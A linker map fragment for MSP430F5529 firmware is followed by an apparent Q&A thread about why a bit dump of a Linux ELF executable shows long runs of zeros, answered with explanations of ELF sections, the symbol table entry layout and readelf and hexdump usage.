.rodata 0x00004400 0x464
0x00004400 . = ALIGN (0x2)
*(.plt)
0x00004400 . = ALIGN (0x2)
*(.lower.rodata.* .lower.rodata)
0x00004400 . = ALIGN (0x2)
*(.rodata .rodata.* .gnu.linkonce.r.* .const .const:*)
.rodata 0x00004400 0x11 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
*fill* 0x00004411 0x1
.rodata.tUsbRequestList
0x00004412 0x15c ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x00004412 tUsbRequestList
.rodata.stUsbHandle
0x0000456e 0x40 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x0000456e stUsbHandle
.rodata.report_desc_HID0
0x000045ae 0x24 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x000045ae report_desc_HID0
.rodata.abromStringDescriptor
0x000045d2 0x146 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x000045d2 abromStringDescriptor
.rodata.abromConfigurationDescriptorGroup
0x00004718 0xef ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x00004718 abromConfigurationDescriptorGroup
.rodata.abromDeviceDescriptor
0x00004807 0x12 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x00004807 abromDeviceDescriptor
*fill* 0x00004819 0x1
.rodata.report_desc_size
0x0000481a 0x2 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x0000481a report_desc_size
.rodata 0x0000481c 0x11 ../subsystem/libcontrol-iface-msp430f5529.a(control_iface.c.obj)
*fill* 0x0000482d 0x1
.rodata.GPIO_PORT_TO_BASE
0x0000482e 0x1c ../peripherals/driverlib/MSP430F5xx_6xx/libdriverlib-msp430f5529.a(gpio.c.obj)
.rodata 0x0000484a 0x7 ../lib/libprintf-msp430f5529.a(printf.c.obj)
*(.rodata1)
*(.eh_frame_hdr)
*(.eh_frame)
*fill* 0x00004851 0x3
.eh_frame 0x00004854 0x0 /opt/ti/gcc/bin/../lib/gcc/msp430-elf/4.9.1/crtbegin.o

Interesting binary dump of executable file

For some reason I wrote a simple C program that outputs the binary representation of its input:
#include <unistd.h> /* read, write */

int main()
{
    char c;
    while(read(0,&c,1) > 0)
    {
        unsigned char cmp = 128;
        while(cmp)
        {
            if(c & cmp)
                write(1,"1",1);
            else
                write(1,"0",1);
            cmp >>= 1;
        }
    }
    return 0;
}
After compilation:
$ gcc bindump.c -o bindump
I ran a simple test to check whether the program can print a binary:
$ cat bindump | ./bindump | fold -b100 | nl
The output is the following: http://pastebin.com/u7SasKDJ
I expected the output to look like a random series of ones and zeros. However, parts of it look more interesting. For example, look at the output between lines 171 and 357. Why are there so many zeros there compared to other sections of the executable?
My architecture is:
$ lscpu
Architecture: i686
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 4
On-line CPU(s) list: 0-3
Thread(s) per core: 2
Core(s) per socket: 2
Socket(s): 1
Vendor ID: GenuineIntel
CPU family: 6
Model: 28
Stepping: 10
CPU MHz: 1000.000
BogoMIPS: 3325.21
Virtualization: VT-x
L1d cache: 24K
L1i cache: 32K
L2 cache: 512K
When you compile a program into an executable on Linux (and a number of other unix systems), it is written in the ELF format. The ELF format has a number of sections, which you can examine with readelf or objdump:
readelf -a bindump | less
For example, section .text contains CPU instructions, .data global variables, .bss uninitialized global variables (it is actually empty in the ELF file itself, but is created in the main memory when the program is executed), .plt and .got which are jump tables, debugging information, etc.
By the way, it is much more convenient to examine the binary content of files with hexdump:
hexdump -C bindump | less
There you can see that starting at offset 0x850 (approximately line 171 in your dump) there are a lot of zeros, and you can also see the ASCII representation on the right.
Let us look at which sections correspond to the block you are interested in, between 0x850 and 0x1160 (the Off field, the offset in the file, is what matters here):
> readelf -a bindump
...
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
...
[28] .shstrtab STRTAB 00000000 00074c 000106 00 0 0 1
[29] .symtab SYMTAB 00000000 000d2c 000440 10 30 45 4
...
You can examine the content of an individual section with -x:
> readelf -x .symtab bindump | less
0x00000000 00000000 00000000 00000000 00000000 ................
0x00000010 00000000 34810408 00000000 03000100 ....4...........
0x00000020 00000000 48810408 00000000 03000200 ....H...........
0x00000030 00000000 68810408 00000000 03000300 ....h...........
0x00000040 00000000 8c810408 00000000 03000400 ................
0x00000050 00000000 b8810408 00000000 03000500 ................
0x00000060 00000000 d8810408 00000000 03000600 ................
You can see that there are many zeros. The section is composed of 16-byte entries (one line of the -x output each) defining symbols. From readelf -a you can see that it has 68 entries, and that the first 27 of them (excluding the very first one) are of type SECTION:
Symbol table '.symtab' contains 68 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 08048134 0 SECTION LOCAL DEFAULT 1
2: 08048148 0 SECTION LOCAL DEFAULT 2
3: 08048168 0 SECTION LOCAL DEFAULT 3
4: 0804818c 0 SECTION LOCAL DEFAULT 4
...
According to the specification (page 1-18), each entry has the following format:
typedef struct {
Elf32_Word st_name;
Elf32_Addr st_value;
Elf32_Word st_size;
unsigned char st_info;
unsigned char st_other;
Elf32_Half st_shndx;
} Elf32_Sym;
Without going into too much detail here, I think what matters here is that st_name and st_size are both zeros for these SECTION entries. Both are 32-bit numbers, which means lots of zeros in this particular section.
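To make the numbers concrete, here is a small sketch that mirrors the Elf32_Sym layout with fixed-width types and counts the zero bytes in one SECTION entry. The struct sym32 and both function names are made up for this example; the field values for the sample entry come from symbol 1 in the listing above.

```c
#include <stddef.h>
#include <stdint.h>

/* Same field order and sizes as Elf32_Sym, using fixed-width types. */
struct sym32 {
    uint32_t st_name;
    uint32_t st_value;
    uint32_t st_size;
    unsigned char st_info;
    unsigned char st_other;
    uint16_t st_shndx;
};

/* Number of symbol entries in a .symtab of the given size in bytes. */
size_t symtab_entries(size_t section_size)
{
    return section_size / sizeof(struct sym32);
}

/* Counts how many of the bytes making up one entry are zero. */
size_t zero_bytes(const struct sym32 *s)
{
    const unsigned char *p = (const unsigned char *)s;
    size_t n = 0;
    for (size_t i = 0; i < sizeof *s; i++)
        if (p[i] == 0)
            n++;
    return n;
}
```

Each entry is 16 bytes, so the 0x440-byte .symtab holds 68 entries, matching the readelf output. For symbol 1 (st_value 0x08048134, st_info 3, st_shndx 1, everything else 0), 10 of the 16 bytes are zero.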
This is not really a programming question, but anyway...
A binary normally consists of different sections: code, data, debugging info, etc. Since the contents of these sections differ by type, I would very much expect them to look different.
For example, the symbol table consists of address offsets in your binary. If I read your lscpu output correctly, you are on a 32-bit system. That means each offset has four bytes, and given the size of your program, in most cases two of those bytes will be zero. There are more effects like this.
You didn't strip your program, which means there is still a lot of information (symbol table etc.) present in the binary. Try stripping the binary and have a look at it again.
